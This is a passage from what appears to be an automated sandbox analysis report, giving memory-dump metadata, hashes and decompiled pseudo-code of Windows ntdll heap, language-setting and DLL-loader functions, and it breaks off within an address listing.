                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                      • API String ID: 0-2897834094
                                                      • Opcode ID: 1dd372c043ff9606ea3aea5f3d98b6ae350970bf7a7bbacfcf95bd35aab6714f
                                                      • Instruction ID: 80f35a713119cc0eba96691529a05507e526ea1365f42dd95fa3da36da4f13ac
                                                      • Opcode Fuzzy Hash: 1dd372c043ff9606ea3aea5f3d98b6ae350970bf7a7bbacfcf95bd35aab6714f
                                                      • Instruction Fuzzy Hash: AC61E832654144EFE351AB84D886E3473A5EB08A30B49897EF609DB752E628BC40DE0F
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04913D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E04913D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E04911B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E04911B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E04911B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E04911B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E04911B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L04924620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0494F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E04951370(_t276, 0x48e4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0494BB40(0,  &_v68, _t170);
									if(L049143C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0494BB40(_t257,  &_v68, _t243);
								if(L049143C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E04951370(_t278, 0x48e4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L04924620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0494F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E04951370(_v16, 0x48e4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0494BB40(_t262,  &_v68, _t244);
								if(L049143C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E04951370(_t282, 0x48e4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0494BB40(_t262,  &_v68, _t201);
							if(L049143C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L04924620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0494F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E04951370(_t280, 0x48e4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0494BB40(_t267,  &_v68, _t245);
							if(L049143C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E04951370(_t284, 0x48e4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0494BB40(_t267,  &_v68, _t224);
						if(L049143C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                      0x04913d3c
                                                      0x04913d42
                                                      0x04913d44
                                                      0x04913d46
                                                      0x04913d49
                                                      0x04913d4c
                                                      0x04913d4f
                                                      0x04913d52
                                                      0x04913d55
                                                      0x04913d58
                                                      0x04913d5b
                                                      0x04913d5f
                                                      0x04913d61
                                                      0x04913d66
                                                      0x04968213
                                                      0x04968218
                                                      0x04914085
                                                      0x04914088
                                                      0x0491408e
                                                      0x04914094
                                                      0x0491409a
                                                      0x049140a0
                                                      0x049140a6
                                                      0x049140a9
                                                      0x049140af
                                                      0x049140b6
                                                      0x049140bd
                                                      0x049140bd
                                                      0x04913d83
                                                      0x0496821f
                                                      0x04968229
                                                      0x04968238
                                                      0x04968238
                                                      0x0496823d
                                                      0x0496823d
                                                      0x04913da0
                                                      0x04913daf
                                                      0x04913db5
                                                      0x04913dba
                                                      0x04913dba
                                                      0x04913dd4
                                                      0x04913e94
                                                      0x04913eab
                                                      0x04913f6d
                                                      0x04913f84
                                                      0x0491406b
                                                      0x0491406b
                                                      0x0491406e
                                                      0x0491406e
                                                      0x04914070
                                                      0x04914074
                                                      0x04968351
                                                      0x04968351
                                                      0x0491407a
                                                      0x0491407f
                                                      0x0496835d
                                                      0x04968370
                                                      0x04968377
                                                      0x04968379
                                                      0x0496837c
                                                      0x0496837c
                                                      0x0496835d
                                                      0x00000000
                                                      0x0491407f
                                                      0x04913f8a
                                                      0x04913f8d
                                                      0x04913f90
                                                      0x04913f95
                                                      0x0496830d
                                                      0x0496830f
                                                      0x04913f9b
                                                      0x04913fac
                                                      0x04913fae
                                                      0x04913fb1
                                                      0x04913fb1
                                                      0x04913fb6
                                                      0x04968317
                                                      0x0496831a
                                                      0x00000000
                                                      0x04913fbc
                                                      0x04913fc1
                                                      0x04913fc9
                                                      0x04913fd7
                                                      0x04913fda
                                                      0x04913fdd
                                                      0x04914021
                                                      0x04914021
                                                      0x04914029
                                                      0x04914030
                                                      0x04914044
                                                      0x04914046
                                                      0x04914046
                                                      0x04914044
                                                      0x04914049
                                                      0x04968327
                                                      0x04968334
                                                      0x04968339
                                                      0x0496833c
                                                      0x0491404f
                                                      0x0491404f
                                                      0x0491404f
                                                      0x04914051
                                                      0x04914056
                                                      0x04914063
                                                      0x04914063
                                                      0x04914068
                                                      0x00000000
                                                      0x04914068
                                                      0x04913fdf
                                                      0x04913fe2
                                                      0x04913fe4
                                                      0x04913fe7
                                                      0x04913fef
                                                      0x04914003
                                                      0x04914005
                                                      0x04914005
                                                      0x0491400c
                                                      0x04914013
                                                      0x04914016
                                                      0x04914017
                                                      0x0491401b
                                                      0x0491401e
                                                      0x00000000
                                                      0x0491401e
                                                      0x04913fb6
                                                      0x04913eb1
                                                      0x04913eb4
                                                      0x04913eb7
                                                      0x04913ebc
                                                      0x049682a9
                                                      0x049682ab
                                                      0x04913ec2
                                                      0x04913ed3
                                                      0x04913ed5
                                                      0x04913ed8
                                                      0x04913ed8
                                                      0x04913edd
                                                      0x049682b3
                                                      0x049682b6
                                                      0x00000000
                                                      0x04913ee3
                                                      0x04913ee8
                                                      0x04913eed
                                                      0x04913ef0
                                                      0x04913ef3
                                                      0x04913f02
                                                      0x04913f05
                                                      0x04913f08
                                                      0x049682c0
                                                      0x049682c3
                                                      0x049682c5
                                                      0x049682c8
                                                      0x049682d0
                                                      0x049682e4
                                                      0x049682e6
                                                      0x049682e6
                                                      0x049682ed
                                                      0x049682f4
                                                      0x049682f7
                                                      0x049682f8
                                                      0x049682fc
                                                      0x049682ff
                                                      0x049682ff
                                                      0x04913f0e
                                                      0x04913f11
                                                      0x04913f16
                                                      0x04913f1d
                                                      0x04913f31
                                                      0x04968307
                                                      0x04968307
                                                      0x04913f31
                                                      0x04913f39
                                                      0x04913f48
                                                      0x04913f4d
                                                      0x04913f50
                                                      0x04913f50
                                                      0x04913f53
                                                      0x04913f58
                                                      0x04913f65
                                                      0x04913f65
                                                      0x04913f6a
                                                      0x00000000
                                                      0x04913f6a
                                                      0x04913edd
                                                      0x04913dda
                                                      0x04913ddd
                                                      0x04913de0
                                                      0x04913de5
                                                      0x04968245
                                                      0x04913deb
                                                      0x04913df7
                                                      0x04913dfc
                                                      0x04913dfe
                                                      0x04913e01
                                                      0x04913e01
                                                      0x04913e06
                                                      0x0496824d
                                                      0x0496824f
                                                      0x04968254
                                                      0x00000000
                                                      0x04913e0c
                                                      0x04913e11
                                                      0x04913e16
                                                      0x04913e19
                                                      0x04913e29
                                                      0x04913e2c
                                                      0x04913e2f
                                                      0x0496825c
                                                      0x0496825f
                                                      0x04968261
                                                      0x04968264
                                                      0x0496826c
                                                      0x04968280
                                                      0x04968282
                                                      0x04968282
                                                      0x04968289
                                                      0x04968290
                                                      0x04968293
                                                      0x04968294
                                                      0x04968298
                                                      0x0496829b
                                                      0x0496829b
                                                      0x04913e35
                                                      0x04913e38
                                                      0x04913e3d
                                                      0x04913e44
                                                      0x04913e58
                                                      0x049682a3
                                                      0x049682a3
                                                      0x04913e58
                                                      0x04913e60
                                                      0x04913e6f
                                                      0x04913e74
                                                      0x04913e77
                                                      0x04913e77
                                                      0x04913e7a
                                                      0x04913e7f
                                                      0x04913e8c
                                                      0x04913e8c
                                                      0x04913e91
                                                      0x00000000
                                                      0x04913e91

                                                      Strings
                                                      • Kernel-MUI-Number-Allowed, xrefs: 04913D8C
                                                      • Kernel-MUI-Language-Disallowed, xrefs: 04913E97
                                                      • Kernel-MUI-Language-Allowed, xrefs: 04913DC0
                                                      • Kernel-MUI-Language-SKU, xrefs: 04913F70
                                                      • WindowsExcludedProcs, xrefs: 04913D6F
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                      • API String ID: 0-258546922
                                                      • Opcode ID: 5287d0693a2c08ff40fcfddcd5be19ea2ff0ff0c77c73e2de9c476e8d70f1e9e
                                                      • Instruction ID: e31b00e873ca6c788325d25b8e1027985261b0febc63b820846c0979b8addde7
                                                      • Opcode Fuzzy Hash: 5287d0693a2c08ff40fcfddcd5be19ea2ff0ff0c77c73e2de9c476e8d70f1e9e
                                                      • Instruction Fuzzy Hash: DFF12A72D01619EFDB11DF99C980EAEBBBDFF48750F14056AE905A7224E734AE01CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04938E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 44%
                                                      			E04938E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x49fd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x49f8464; // 0x76d30110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x49f5780 & 0x00000003) != 0) {
							E04985510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x49f5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0494B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x49f7984; // 0xc63ea0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x49f8464; // 0x76d30110
					 *0x49fb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E04939B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x49f5780 & 0x00000005) != 0) {
						_push(_t49);
						E04985510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                      0x04938e0f
                                                      0x04938e16
                                                      0x04938e19
                                                      0x04938e1b
                                                      0x04938e21
                                                      0x04938e7f
                                                      0x04938e85
                                                      0x04979354
                                                      0x0497936c
                                                      0x04979371
                                                      0x0497937b
                                                      0x04979381
                                                      0x04979381
                                                      0x0497937b
                                                      0x04938e9d
                                                      0x04938e9d
                                                      0x04938e29
                                                      0x04938e2c
                                                      0x04938e38
                                                      0x04938e3e
                                                      0x04938e43
                                                      0x04938eb5
                                                      0x04938eb9
                                                      0x049792aa
                                                      0x049792af
                                                      0x049792e8
                                                      0x049792e8
                                                      0x049792af
                                                      0x04938eb9
                                                      0x04938e45
                                                      0x04938e53
                                                      0x04938e5b
                                                      0x04938e5f
                                                      0x04938e78
                                                      0x04938e78
                                                      0x04938e7d
                                                      0x04938ec3
                                                      0x04938ecd
                                                      0x04938ed2
                                                      0x04938ed2
                                                      0x04938ec5
                                                      0x04938ec5
                                                      0x00000000
                                                      0x04938e7d
                                                      0x04938e67
                                                      0x04938ea4
                                                      0x0497931a
                                                      0x00000000
                                                      0x00000000
                                                      0x04979320
                                                      0x04938ea4
                                                      0x04938e70
                                                      0x04979325
                                                      0x04979340
                                                      0x04979345
                                                      0x04979345
                                                      0x04938e76
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Strings
                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 0497933B, 04979367
                                                      • LdrpFindDllActivationContext, xrefs: 04979331, 0497935D
                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0497932A
                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 04979357
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                      • API String ID: 0-3779518884
                                                      • Opcode ID: 1aafa0db5c2a501b5dbb8538f1164ccdf8bdc9777b79b90fa1fee792bd2cbe07
                                                      • Instruction ID: ffdcc1ba59356866fecf1a604c3f8c0c67118e97eda4e2528fae3408cb03d11d
                                                      • Opcode Fuzzy Hash: 1aafa0db5c2a501b5dbb8538f1164ccdf8bdc9777b79b90fa1fee792bd2cbe07
                                                      • Instruction Fuzzy Hash: D8411662A00315AFDB35FE18C84CB36B6F9EB4335AF064579F81897551EB64BC808781
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04918794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 83%
                                                      			E04918794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0491934A() != 0) {
								_t159 = E0498A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x49f5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E04985510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x49f5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0491849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E04918999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E04918999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x49f5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x49f5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E04922280(_t92, 0x49f86cc);
															_t94 = E049D9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E049361A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x49f5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E04918A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x49f5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x49f5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0494F380(_t136, 0x48e1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E04922280(_t108, 0x49f86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E049361A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E049D9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0491FFB0(_t118, _t156, 0x49f86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E04949A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                      0x04918799
                                                      0x0491879d
                                                      0x049187a1
                                                      0x049187a3
                                                      0x049187a8
                                                      0x049187c3
                                                      0x049187c3
                                                      0x049187c8
                                                      0x049187d1
                                                      0x049187d4
                                                      0x049187d8
                                                      0x049187e5
                                                      0x049187ec
                                                      0x04969bfe
                                                      0x04969c00
                                                      0x04969c02
                                                      0x04969c08
                                                      0x04969c0d
                                                      0x04969c0f
                                                      0x04969c14
                                                      0x04969c2d
                                                      0x04969c32
                                                      0x04969c37
                                                      0x04969c3a
                                                      0x04969c3c
                                                      0x04969c42
